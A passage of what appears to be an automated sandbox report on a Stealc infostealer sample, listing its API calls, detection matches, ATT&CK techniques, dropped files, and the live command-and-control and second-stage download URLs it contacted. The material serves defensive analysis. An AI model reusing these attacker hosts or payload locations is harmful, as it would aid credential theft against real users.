                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0304B509
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0304B554
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: EnumSystemLocalesW,0_2_0304B5EF
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_03045447
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0304BBC9
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_0304BAFC
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0304B9F5
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_0304B8C2
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: GetLocaleInfoW,0_2_0304B8CC
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00417B90
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_02F17DF7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00417850
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00417A30
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.2f00e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.2f00e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.64A.tmp.exe.4820000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.64A.tmp.exe.4820000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.2f00e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.2f00e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.64A.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.64A.tmp.exe.4820000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.64A.tmp.exe.4820000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 64A.tmp.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03031B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_03031B53
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03030E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_03030E7D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                  Native API                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		11
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Query Registry                  		Remote Desktop Protocol3
                  Clipboard Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Disable or Modify Tools                  		Security Account Manager131
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS11
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets11
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Software Packing                  		DCSync1
                  Account Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                  File and Directory Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing134
                  System Information Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  mCe4hBfqCT.exe39%ReversingLabsWin32.Trojan.CrypterX
                  mCe4hBfqCT.exe42%VirustotalBrowse
                  mCe4hBfqCT.exe100%AviraHEUR/AGEN.1312567
                  mCe4hBfqCT.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\64A.tmp.exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Temp\64A.tmp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe45%ReversingLabsWin32.Trojan.CrypterX
                  C:\Users\user\AppData\Local\Temp\64A.tmp.exe45%ReversingLabsWin32.Trojan.CrypterX

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  post-to-me.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://upx.sf.net0%URL Reputationsafe
                  http://62.204.41.177/edd20096ecef326d.php18%VirustotalBrowse
                  https://post-to-me.com/track_prt.php?sub=&cc=DE3%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		104.21.56.70
                  		truefalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://62.204.41.177/edd20096ecef326d.phptrueunknown
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                    		unknown
                    http://62.204.41.177/true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://post-to-me.com/track_prt.php?sub=&cc=DEmCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalseunknown
                      http://62.204.41.177sLA64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=mCe4hBfqCT.exefalse
                          		unknown
                          http://62.204.41.177/edd20096ecef326d.phpunf64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://176.113.115.37/ScreenUpdateSync.exeYmCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWAREmCe4hBfqCT.exe, 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                		unknown
                                https://post-to-me.com/mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://62.204.41.177/edd20096ecef326d.phpfj64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://upx.sf.netAmcache.hve.6.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://post-to-me.com/6mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://post-to-me.com/track_prt.php?sub=0&cc=DEfmCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://176.113.115.37/ScreenUpdateSync.exemCe4hBfqCT.exe, mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000003.4371587584.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, mCe4hBfqCT.exe, 00000000.00000002.4504361306.0000000002DCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://62.204.41.177/edd20096ecef326d.php1nZ64A.tmp.exe, 00000002.00000002.2422589956.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://62.204.41.17764A.tmp.exe, 00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, 64A.tmp.exe, 00000002.00000002.2422523199.0000000002D0E000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              http://176.113.115.37/ScreenUpdateSync.exe)mCe4hBfqCT.exe, 00000000.00000002.4504279710.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                176.113.115.37
                                                		unknownRussian Federation
                                                		49505SELECTELRUfalse
                                                62.204.41.177
                                                		unknownUnited Kingdom
                                                		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                104.21.56.70
                                                		post-to-me.comUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1542736
                                                Start date and time:2024-10-26 08:55:10 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 9s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:9
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:mCe4hBfqCT.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:5b01b239f2b48841380e3665d1c3f98a.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 51
                                                • Number of non-executed functions: 376
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.189.173.20
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:56:06API Interceptor9996688x Sleep call for process: mCe4hBfqCT.exe modified
                                                02:56:39API Interceptor1x Sleep call for process: WerFault.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                176.113.115.37BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                • 176.113.115.37/seed.exe
                                                M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37/ScreenUpdateSync.exe
                                                XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                • 176.113.115.37/seed.exe
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 176.113.115.37/seed.exe
                                                62.204.41.177Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                v32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177/edd20096ecef326d.php

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                post-to-me.comBKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 172.67.179.207
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                • 172.67.179.207
                                                hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                • 104.21.56.70
                                                M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                • 172.67.179.207
                                                InstallSetup.exeGet hashmaliciousStealcBrowse
                                                • 172.67.179.207

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUShttps://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/taxigiarebienhoa.vn/nini/ybmex/captcha/Z3VsYW1yYXN1bC5jaGVwdXdhbGFAY2V2YWxvZ2lzdGljcy5jb20Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                • 188.114.97.3
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                • 104.21.95.91
                                                transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 188.114.96.3
                                                8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                Hxn7F5YIYJ.lnkGet hashmaliciousUnknownBrowse
                                                • 188.114.96.3
                                                8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.14.67
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                • 104.21.95.91
                                                CheatInjector.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.95.91
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                • 104.21.95.91
                                                SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                • 104.18.10.89
                                                SELECTELRUBKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 176.113.115.37
                                                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 92.53.102.17
                                                la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                • 95.213.162.65
                                                SecuriteInfo.com.Program.RemoteAdmin.904.16436.20637.exeGet hashmaliciousFlawedAmmyyBrowse
                                                • 95.213.191.237
                                                jYDYjpSbvf.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, StealcBrowse
                                                • 176.113.115.95
                                                CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                • 176.113.115.37
                                                TNNET-ASTNNetOyMainnetworkFIOndso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177
                                                cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                v32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                37f463bf4616ecd445d4a1937da06e19H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                • 104.21.56.70
                                                factura Fvsae2400398241025.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 104.21.56.70
                                                SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.56.70
                                                BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                Rampage.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                • 104.21.56.70
                                                v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 104.21.56.70
                                                RFQ_24196MR_PDF.vbsGet hashmaliciousGuLoaderBrowse
                                                • 104.21.56.70

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_64A.tmp.exe_33dbb5a6d938e48242e380f4b853a57f3a468_cc65f0ba_b0e79d25-d904-438b-88ac-c26ceb49f3b6\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9627117858697094
                                                Encrypted:false
                                                SSDEEP:192:ozgVapn0E5n82jMhZrMZlzuiFvZ24IO8B:Zap0E5n82jjrzuiFvY4IO8B
                                                MD5:F62E2573BD974D4F3DE79738504E7150
                                                SHA1:B407ECE643AE4A35CB7C6849D4CB6B09E4D106EA
                                                SHA-256:8CF7862BB9D81D67157A1D99299ED261CAB245DF3C791BE3E2A0B5C0EA34C46B
                                                SHA-512:23D2071C6048A038E01F0245585FF556359357D472DC57C89DADB3813A36DB6690100867F8B44583D193DB6569358269264B694DD4C399E78171A698A8EACC17
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.9.9.3.7.8.3.4.3.6.5.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.9.9.3.7.8.9.3.7.4.1.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.e.7.9.d.2.5.-.d.9.0.4.-.4.3.8.b.-.8.8.a.c.-.c.2.6.c.e.b.4.9.f.3.b.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.7.3.f.d.d.5.-.f.6.d.b.-.4.1.c.7.-.b.1.3.a.-.1.a.b.9.f.9.c.5.a.a.0.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.4.A...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.8.-.0.0.0.1.-.0.0.1.4.-.b.4.5.1.-.7.2.2.3.7.4.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.c.a.9.c.5.e.c.a.3.6.a.f.5.b.c.1.6.c.b.9.8.3.d.8.f.f.f.8.f.a.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.5.f.5.7.8.9.3.d.e.5.0.e.1.3.a.4.2.a.e.a.f.0.b.9.0.5.c.5.3.2.2.0.4.5.8.a.1.3.!.6.4.A...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.

